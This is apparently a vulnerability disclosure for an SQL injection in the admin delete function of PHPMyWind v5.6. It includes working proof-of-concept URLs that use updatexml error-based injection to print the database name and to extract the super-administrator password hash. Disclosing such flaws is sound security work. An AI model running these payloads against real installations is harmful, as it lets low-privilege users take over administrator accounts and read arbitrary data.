Description
Product Homepage:http://phpmywind.com/
hello!
I found a serious SQL injection vulnerability in the backend management system(/admin/admin_save.php) of PHPMyWind v5.6
This vulnerability allows low-privilege site administrators to gain access to super-administrator accounts and passwords
Vulnerability validation:
First, there are three types of administrators in the current system: super administrators, site administrators, and article publishers

Now to the site administrator login background management system, click the administrator management, and then "delete function" is the location of the vulnerability

it's url is http://127.0.0.1/admin/admin_save.php?action=del&id=4

POC
(1)
http://127.0.0.1/admin/admin_save.php?action=del&id=4%27

(2)show the current database
http://127.0.0.1/admin/admin_save.php?action=del&id=4%20%20and%20id%20in%20(char(@`%27`),updatexml(1,concat(0x7e,(select%20database())),1),char(@`%27`))

(3) Query out the super administrator password
http://127.0.0.1/admin/admin_save.php?action=del&id=4 and id in (char(@`'`),updatexml(1,concat(0x7e,(select password from pmw_admin limit 0,1)),1),char(@`'`))

This vulnerability allows you to query the database for any data you want
